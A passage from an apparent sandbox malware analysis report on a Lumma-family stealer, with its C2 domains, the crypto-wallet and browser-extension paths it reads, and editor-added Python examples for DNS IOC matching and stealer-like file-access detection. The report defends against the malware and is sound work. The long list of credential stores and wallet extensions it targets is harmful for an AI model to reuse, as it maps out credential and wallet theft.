Source: 0WO49yZcDA.exe, 00000000.00000002.2513053695.0000000000F71000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: grannyejh.lat
Source: 0WO49yZcDA.exe, 00000000.00000002.2513053695.0000000000F71000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: sweepyribs.lat
Source: 0WO49yZcDA.exe, 00000000.00000002.2513179164.000000000114C000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: iuProgram Manager
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: 0WO49yZcDA.exe, 00000000.00000002.2514052437.0000000001996000.00000004.00000020.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2462590100.0000000001979000.00000004.00000020.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2503713182.0000000001996000.00000004.00000020.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2462451964.0000000001977000.00000004.00000020.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2503586892.0000000001996000.00000004.00000020.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2462451964.0000000001996000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
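The nine .lat domains in the rows above are the C2 names the sample carries (the "C2 URLs / IPs found in malware configuration" signature in the overview), all recovered from the same decrypted image region. What follows is an editor-added example, not part of the report: it turns that list into Suricata dns.query rules and matches it against resolver log lines. The log lines and their whitespace-separated format are constructed for the example, and the SID range is assumed. The Python matcher requires a label boundary, so "notgrannyejh.lat" does not match "grannyejh.lat"; the generated Suricata rules use a plain content match, which is a substring test. That is acceptable for labels this long and random but worth remembering when the IOC is a short domain.

```python
"""Turn the C2 domains carved from the sample's memory into DNS detections and
match them against resolver logs."""
from collections import Counter
from dataclasses import dataclass

# The nine .lat domains listed in the report rows above.
C2_DOMAINS = [
    "rapeflowwj.lat", "crosshuaht.lat", "sustainskelet.lat", "aspecteirs.lat",
    "energyaffai.lat", "necklacebudi.lat", "discokeyus.lat", "grannyejh.lat",
    "sweepyribs.lat",
]

# Constructed resolver log: "<timestamp> <client> <qname> <qtype>" per line.
DNS_LOG = """\
2024-12-20T10:01:02Z 10.0.0.15 www.microsoft.com A
2024-12-20T10:01:07Z 10.0.0.15 crosshuaht.lat A
2024-12-20T10:01:08Z 10.0.0.15 SweepyRibs.LAT. A
2024-12-20T10:01:09Z 10.0.0.15 cdn.discokeyus.lat A
2024-12-20T10:01:10Z 10.0.0.22 notgrannyejh.lat A
"""


def normalize(qname):
    """Lower-case and drop the trailing dot of a fully qualified name."""
    return qname.strip().rstrip(".").lower()


def matches_ioc(qname, iocs=C2_DOMAINS):
    """Return the matching IOC for an exact or subdomain match, else None."""
    q = normalize(qname)
    for dom in iocs:
        if q == dom or q.endswith("." + dom):   # label boundary: 'notgrannyejh.lat' is not a hit
            return dom
    return None


@dataclass
class DnsHit:
    ts: str
    client: str
    qname: str
    ioc: str


def scan_dns_log(text, iocs=C2_DOMAINS):
    hits = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 3:
            continue
        ioc = matches_ioc(parts[2], iocs)
        if ioc:
            hits.append(DnsHit(parts[0], parts[1], normalize(parts[2]), ioc))
    return hits


def clients_contacting_c2(hits):
    """Hit count per source address, the pivot for host triage."""
    return dict(Counter(h.client for h in hits))


def suricata_rules(iocs=C2_DOMAINS, base_sid=9000001):
    """One dns.query rule per domain; the local SID range is an assumption."""
    rules = []
    for i, dom in enumerate(sorted(iocs)):
        rules.append(
            f'alert dns any any -> any any (msg:"LummaC C2 DNS query {dom}"; '
            f'dns.query; content:"{dom}"; nocase; '
            f'classtype:trojan-activity; sid:{base_sid + i}; rev:1;)'
        )
    return rules


if __name__ == "__main__":
    found = scan_dns_log(DNS_LOG)
    for h in found:
        print(f"{h.ts} {h.client} queried {h.qname} -> {h.ioc}")
    print(clients_contacting_c2(found))
    print("\n".join(suricata_rules()))
```

On the constructed log the scanner reports three queries from 10.0.0.15 (one exact, one with a trailing dot and mixed case, one subdomain) and ignores the look-alike from 10.0.0.22. Lumma samples rotate through several fallback domains, so a host that resolves more than one of them in quick succession is a stronger signal than any single query.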

Stealing of Sensitive Information

Source: Yara match | File source: Process Memory Space: 0WO49yZcDA.exe PID: 1732, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
Source: 0WO49yZcDA.exe, 00000000.00000003.2412277604.00000000019F5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum-LTC\wallets32
Source: 0WO49yZcDA.exe, 00000000.00000003.2412277604.00000000019F5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \??\C:\Users\user\AppData\Roaming\ElectronCash\wallets
Source: 0WO49yZcDA.exe, 00000000.00000003.2412242953.000000000612C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: Jaxx LibertyNA
Source: 0WO49yZcDA.exe, 00000000.00000002.2514052437.0000000001996000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: window-state.json
Source: 0WO49yZcDA.exe, 00000000.00000003.2412277604.00000000019F5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: 0WO49yZcDA.exe | String found in binary or memory: ExodusWeb3
Source: 0WO49yZcDA.exe, 00000000.00000002.2514052437.0000000001996000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Ethereum
Source: 0WO49yZcDA.exe, 00000000.00000003.2412277604.0000000001996000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: 0WO49yZcDA.exe, 00000000.00000003.2412277604.0000000001996000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: um","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":
Source: 0WO49yZcDA.exe, 00000000.00000003.2412704361.0000000001985000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live
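The wallet paths above (Electrum-LTC, ElectronCash, Exodus, Coinomi, Ledger Live, the Ethereum keystore fragment of the stealer's JSON target list) and the file-open rows that follow, in which the process reads Chrome's Login Data, Web Data, Network\Cookies and History, Edge's History and Cookies, the Firefox profile's cert9.db, cookies.sqlite and formhistory.sqlite, and a long run of Local Extension Settings directories (Chrome extension IDs are 32 letters from a to p), describe a file-access pattern that is the practical detection point for this family. The scorer below is an editor-added example, not the report's or Joe Sandbox's code: it profiles (pid, image, path) file-open records per process and flags a process that touches several credential stores plus many extension stores, or a credential store together with a wallet directory. The thresholds and the browser allow-list are assumptions for this example; the events are constructed from this report's PID and paths, plus benign noise. key4.db and logins.json are Firefox's saved-login files and are included even though this report does not list them.

```python
"""Score per-process file-open telemetry for the browser-credential, extension-storage
and wallet access pattern the report rows show."""
import ntpath
import re
from dataclasses import dataclass, field

# File names that hold browser credentials, cookies or history (Chromium and Firefox).
CRED_STORES = {
    "login data", "web data", "cookies", "history",                                   # Chromium
    "cert9.db", "key4.db", "logins.json", "cookies.sqlite", "formhistory.sqlite",    # Firefox
}
# Chromium extension storage directories; extension IDs are 32 letters a-p.
EXT_DIR_RE = re.compile(r"\\(?:Local|Sync) Extension Settings\\([a-p]{32})", re.I)
# Wallet locations named in the report's memory strings.
WALLET_MARKERS = ("\\Exodus\\", "\\Electrum", "\\ElectronCash\\", "\\Coinomi\\",
                  "\\Ledger Live", "\\Ethereum")
# Browsers legitimately open their own stores. Assumption: allow-list by image name;
# a stealer injected into a browser needs a separate injection detection.
BROWSER_IMAGES = {"chrome.exe", "msedge.exe", "firefox.exe"}


@dataclass
class ProcessProfile:
    image: str
    cred_stores: set = field(default_factory=set)
    extension_ids: set = field(default_factory=set)
    wallets: set = field(default_factory=set)

    def is_stealer_like(self):
        # Thresholds are an assumption for this example, not taken from the report.
        if self.image.lower() in BROWSER_IMAGES:
            return False
        broad_browser_sweep = len(self.cred_stores) >= 2 and len(self.extension_ids) >= 5
        creds_plus_wallet = bool(self.cred_stores) and bool(self.wallets)
        return broad_browser_sweep or creds_plus_wallet


def profile_events(events):
    """events: iterable of (pid, image, path) file-open records -> {pid: ProcessProfile}."""
    profiles = {}
    for pid, image, path in events:
        prof = profiles.setdefault(pid, ProcessProfile(image=image))
        lowered = path.lower()
        if ntpath.basename(path).lower() in CRED_STORES:
            prof.cred_stores.add(lowered)
        m = EXT_DIR_RE.search(path)
        if m:
            prof.extension_ids.add(m.group(1).lower())
        for marker in WALLET_MARKERS:
            if marker.lower() in lowered:
                prof.wallets.add(marker)
    return profiles


def flagged(events):
    """(pid, image) of every process whose profile looks like a stealer."""
    return [(pid, p.image) for pid, p in profile_events(events).items() if p.is_stealer_like()]


CHROME = r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default"
FIREFOX = r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release"
# Constructed sample: this report's PID and paths, plus a browser and explorer as noise.
SAMPLE_EVENTS = [
    (1732, "0WO49yZcDA.exe", CHROME + r"\Login Data"),
    (1732, "0WO49yZcDA.exe", CHROME + r"\Web Data"),
    (1732, "0WO49yZcDA.exe", CHROME + r"\Network\Cookies"),
    (1732, "0WO49yZcDA.exe", r"C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History"),
    (1732, "0WO49yZcDA.exe", FIREFOX + r"\cert9.db"),
    (1732, "0WO49yZcDA.exe", FIREFOX + r"\cookies.sqlite"),
    (1732, "0WO49yZcDA.exe", CHROME + r"\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn"),
    (1732, "0WO49yZcDA.exe", CHROME + r"\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh"),
    (1732, "0WO49yZcDA.exe", CHROME + r"\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp"),
    (1732, "0WO49yZcDA.exe", CHROME + r"\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj"),
    (1732, "0WO49yZcDA.exe", CHROME + r"\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic"),
    (1732, "0WO49yZcDA.exe", CHROME + r"\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb"),
    (1732, "0WO49yZcDA.exe", r"C:\Users\user\AppData\Roaming\Exodus\exodus.wallet"),
    (4120, "chrome.exe", CHROME + r"\Login Data"),
    (4120, "chrome.exe", CHROME + r"\Network\Cookies"),
    (4120, "chrome.exe", CHROME + r"\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb"),
    (812, "explorer.exe", r"C:\Users\user\Documents\notes.txt"),
]

if __name__ == "__main__":
    for pid, prof in profile_events(SAMPLE_EVENTS).items():
        print(pid, prof.image, len(prof.cred_stores), len(prof.extension_ids),
              sorted(prof.wallets), prof.is_stealer_like())
```

Sysmon does not log file opens, so the input here is EDR file-access telemetry or a sandbox's file-open list like the one in this report. The allow-list keeps the browser's own reads of its profile out of the verdict, which also means a stealer that injects into the browser passes; pair the scorer with process-injection detection rather than relying on it alone.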
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflal
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                Source: C:\Users\user\Desktop\0WO49yZcDA.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                Source: C:\Users\user\Desktop\0WO49yZcDA.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                Source: C:\Users\user\Desktop\0WO49yZcDA.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                Source: C:\Users\user\Desktop\0WO49yZcDA.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                Source: C:\Users\user\Desktop\0WO49yZcDA.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                Source: C:\Users\user\Desktop\0WO49yZcDA.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                Source: C:\Users\user\Desktop\0WO49yZcDA.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                Source: C:\Users\user\Desktop\0WO49yZcDA.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                Source: C:\Users\user\Desktop\0WO49yZcDA.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                Source: C:\Users\user\Desktop\0WO49yZcDA.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                Source: C:\Users\user\Desktop\0WO49yZcDA.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                Source: C:\Users\user\Desktop\0WO49yZcDA.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
                Source: C:\Users\user\Desktop\0WO49yZcDA.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                Source: C:\Users\user\Desktop\0WO49yZcDA.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                Source: C:\Users\user\Desktop\0WO49yZcDA.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                Source: C:\Users\user\Desktop\0WO49yZcDA.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                Source: C:\Users\user\Desktop\0WO49yZcDA.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
                Source: C:\Users\user\Desktop\0WO49yZcDA.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                Source: C:\Users\user\Desktop\0WO49yZcDA.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                Source: C:\Users\user\Desktop\0WO49yZcDA.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                Source: C:\Users\user\Desktop\0WO49yZcDA.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
                Source: C:\Users\user\Desktop\0WO49yZcDA.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                Source: C:\Users\user\Desktop\0WO49yZcDA.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                Source: C:\Users\user\Desktop\0WO49yZcDA.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                Source: C:\Users\user\Desktop\0WO49yZcDA.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json
                Source: C:\Users\user\Desktop\0WO49yZcDA.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                Source: C:\Users\user\Desktop\0WO49yZcDA.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                Source: C:\Users\user\Desktop\0WO49yZcDA.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                Source: C:\Users\user\Desktop\0WO49yZcDA.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                Source: C:\Users\user\Desktop\0WO49yZcDA.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                Source: C:\Users\user\Desktop\0WO49yZcDA.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                Source: C:\Users\user\Desktop\0WO49yZcDA.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                Source: C:\Users\user\Desktop\0WO49yZcDA.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
                Source: C:\Users\user\Desktop\0WO49yZcDA.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                Source: C:\Users\user\Desktop\0WO49yZcDA.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                Source: C:\Users\user\Desktop\0WO49yZcDA.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                Source: C:\Users\user\Desktop\0WO49yZcDA.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
